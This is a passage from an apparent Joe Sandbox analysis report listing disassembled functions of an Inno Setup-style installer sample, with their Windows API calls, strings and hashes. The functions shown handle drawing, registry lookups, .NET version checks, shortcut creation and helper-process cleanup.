                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoadVersion
                                                                              • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                              • API String ID: 1968650500-2910565190
                                                                              • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                              • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                              • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                              • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0041CA40
                                                                              • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                              • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                              • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                              • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                              • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                              • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                              • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                              • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                              • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                              • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                              • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                              • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                              • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                              • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                              • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                              • String ID:
                                                                              • API String ID: 269503290-0
                                                                              • Opcode ID: 5610cf759d7025b655e2849d1764ebaab2a311e46506ba216d1aa554289a1213
                                                                              • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                              • Opcode Fuzzy Hash: 5610cf759d7025b655e2849d1764ebaab2a311e46506ba216d1aa554289a1213
                                                                              • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000005,00000000,004982D8,?,?,00000000,?,00000000,00000000,?,0049868F,00000000,00498699,?,00000000), ref: 00497FC3
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004982D8,?,?,00000000,?,00000000,00000000,?,0049868F,00000000), ref: 00497FD6
                                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004982D8,?,?,00000000,?,00000000,00000000), ref: 00497FE6
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498007
                                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004982D8,?,?,00000000,?,00000000), ref: 00498017
                                                                                • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                              • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                              • API String ID: 2000705611-3672972446
                                                                              • Opcode ID: acab9580149f75eae7839736e9631fcca2424d0ecbbcfe327cba637ac9836c34
                                                                              • Instruction ID: 42a01cccdaaec234e2c43ae8d099a56eb68d33786198a0d03eeaed72e33259cf
                                                                              • Opcode Fuzzy Hash: acab9580149f75eae7839736e9631fcca2424d0ecbbcfe327cba637ac9836c34
                                                                              • Instruction Fuzzy Hash: 3991B530A046049FDF11EBA9D852BAE7BA4EB4A704F5144BBF500AB682DE7D9C05CB1D
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,0045A7E4,?,?,?,?,?,00000006,?,00000000,004973CD,?,00000000,00497470), ref: 0045A696
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                              • API String ID: 1452528299-3112430753
                                                                              • Opcode ID: 7b4c67a2979538d05da33b0281ac62305e71b724ae5420e86ae83fd1cfea1fbc
                                                                              • Instruction ID: 3d84b67d4b55823e814de2816039390ec2683d954eb16ce362ee678782389cb9
                                                                              • Opcode Fuzzy Hash: 7b4c67a2979538d05da33b0281ac62305e71b724ae5420e86ae83fd1cfea1fbc
                                                                              • Instruction Fuzzy Hash: 9A719030B002485BCB10EB698891BAE77B59F48719F54856BFC01AB383DA7CDE1D875E
                                                                              APIs
                                                                              • GetVersion.KERNEL32 ref: 0045CA2A
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA4A
                                                                              • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA57
                                                                              • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA64
                                                                              • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA72
                                                                                • Part of subcall function 0045C918: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C9B7,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C991
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC65,?,?,00000000), ref: 0045CB2B
                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC65,?,?,00000000), ref: 0045CB34
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                              • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                              • API String ID: 59345061-4263478283
                                                                              • Opcode ID: 551fcf749c72914a38171c600357803e83c81dab8682d1b21c615cfe1b656b91
                                                                              • Instruction ID: 9267600119b74d5c47b6def8195b3f0e3f25b5cd065e112b6ecb42d85fa503a5
                                                                              • Opcode Fuzzy Hash: 551fcf749c72914a38171c600357803e83c81dab8682d1b21c615cfe1b656b91
                                                                              • Instruction Fuzzy Hash: B1518571900708EFDB11DFA9C885BAEBBB8EB4C311F14806AF915B7241C6799944CFA9
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004568A1), ref: 004565A6
                                                                              • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004568A1), ref: 004565CC
                                                                              • SysFreeString.OLEAUT32(?), ref: 00456759
                                                                              Strings
                                                                              • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566BB
                                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566EF
                                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456790
                                                                              • CoCreateInstance, xrefs: 004565D7
                                                                              • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567CA
                                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045673E
                                                                              • IPersistFile::Save, xrefs: 00456828
                                                                              • IPropertyStore::Commit, xrefs: 004567A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance$FreeString
                                                                              • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                              • API String ID: 308859552-3936712486
                                                                              • Opcode ID: c517585abefeef5e4aecaacf0f1214f05652fa0e4087abcedef047af4287d9d3
                                                                              • Instruction ID: 8ea5dda7a560ded85d07eb9974ca036a449deae5e5e286e87ef099e1c3d3d79c
                                                                              • Opcode Fuzzy Hash: c517585abefeef5e4aecaacf0f1214f05652fa0e4087abcedef047af4287d9d3
                                                                              • Instruction Fuzzy Hash: 70A12171A00105AFDB50DFA9C885BAE77F8EF09306F55406AF904E7262DB38DD48CB69
                                                                              APIs
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                              • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                              • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                              • GetDC.USER32(00000000), ref: 0041B402
                                                                              • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                              • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                              • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                              • String ID:
                                                                              • API String ID: 644427674-0
                                                                              • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                              • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                              • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                              • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                              APIs
                                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472B74
                                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472C7B
                                                                              • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C91
                                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472CB6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                              • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                              • API String ID: 971782779-3668018701
                                                                              • Opcode ID: f320f92f694209bf3d87b242267b6161fd66681942871ca2a5a7eb633dffa5fc
                                                                              • Instruction ID: 488d38facc3b5b4348deb9d7b7a0b4180c51b54c04cb4348039bcbbbcac6ad39
                                                                              • Opcode Fuzzy Hash: f320f92f694209bf3d87b242267b6161fd66681942871ca2a5a7eb633dffa5fc
                                                                              • Instruction Fuzzy Hash: 62D13574A001499FDB11EFA9D981BDDBBF5AF08304F50806AF904B7392C778AE45CB69
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegQueryValueExA.ADVAPI32(0045A9BA,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045A9BA,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                              • RegQueryValueExA.ADVAPI32(0045A9BA,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045A9BA,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                              • RegQueryValueExA.ADVAPI32(0045A9BA,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045A9BA,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                              Strings
                                                                              • RegOpenKeyEx, xrefs: 00454910
                                                                              • , xrefs: 004548FE
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$FormatMessageOpen
                                                                              • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                              • API String ID: 2812809588-1577016196
                                                                              • Opcode ID: d2d2157a54bb89dc076ef9e0fa42170e86ba3ac777985cc89856524af98327e3
                                                                              • Instruction ID: 10c729c5df0f457655d9edc07d187ac9b2ad403c2690153cc8aec617143616fc
                                                                              • Opcode Fuzzy Hash: d2d2157a54bb89dc076ef9e0fa42170e86ba3ac777985cc89856524af98327e3
                                                                              • Instruction Fuzzy Hash: D1914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                              APIs
                                                                                • Part of subcall function 004591B4: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592F1,00000000,004594A9,?,00000000,00000000,00000000), ref: 00459201
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004594A9,?,00000000,00000000,00000000), ref: 0045934F
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004594A9,?,00000000,00000000,00000000), ref: 004593B9
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004594A9,?,00000000,00000000,00000000), ref: 00459420
                                                                              Strings
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045936C
                                                                              • v1.1.4322, xrefs: 00459412
                                                                              • v4.0.30319, xrefs: 00459341
                                                                              • v2.0.50727, xrefs: 004593AB
                                                                              • .NET Framework not found, xrefs: 0045946D
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459302
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593D3
                                                                              • .NET Framework version %s not found, xrefs: 00459459
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Open
                                                                              • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                              • API String ID: 2976201327-446240816
                                                                              • Opcode ID: 54e34cd44602b93ede3f7296a9310ab82d879df4d5c444ac47c898e8d614a2f1
                                                                              • Instruction ID: 97f3333ca529404cdccdc0b2d9ed50ca34310147e07c283222f48f4afab481b6
                                                                              • Opcode Fuzzy Hash: 54e34cd44602b93ede3f7296a9310ab82d879df4d5c444ac47c898e8d614a2f1
                                                                              • Instruction Fuzzy Hash: 7551B331A04144DBCB04DFA8D8A17EE77B6DB49305F54447BA841DB392E73D9E0ACB18
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(?), ref: 004588CB
                                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588E7
                                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588F5
                                                                              • GetExitCodeProcess.KERNEL32(?), ref: 00458906
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045894D
                                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458969
                                                                              Strings
                                                                              • Helper process exited, but failed to get exit code., xrefs: 0045893F
                                                                              • Helper isn't responding; killing it., xrefs: 004588D7
                                                                              • Helper process exited., xrefs: 00458915
                                                                              • Helper process exited with failure code: 0x%x, xrefs: 00458933
                                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 004588BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                              • API String ID: 3355656108-1243109208
                                                                              • Opcode ID: 73dbfa3cdad617e305c3f832d4c000a78a7b9bdfac17e51cf2f5e1c942fa38a0
                                                                              • Instruction ID: 059a586d5f9fe809614c5be1e0bb00d3bdcd38e01f6b882276f5f7501e11c42c
                                                                              • Opcode Fuzzy Hash: 73dbfa3cdad617e305c3f832d4c000a78a7b9bdfac17e51cf2f5e1c942fa38a0
                                                                              • Instruction Fuzzy Hash: 4C2130706087409AD720E67AC485B6B76D4AF08305F00C82FB9DAE7693DE78E848D75B
                                                                              APIs
                                                                                • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                              Strings
                                                                              • RegCreateKeyEx, xrefs: 004545C3
                                                                              • , xrefs: 004545B1
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
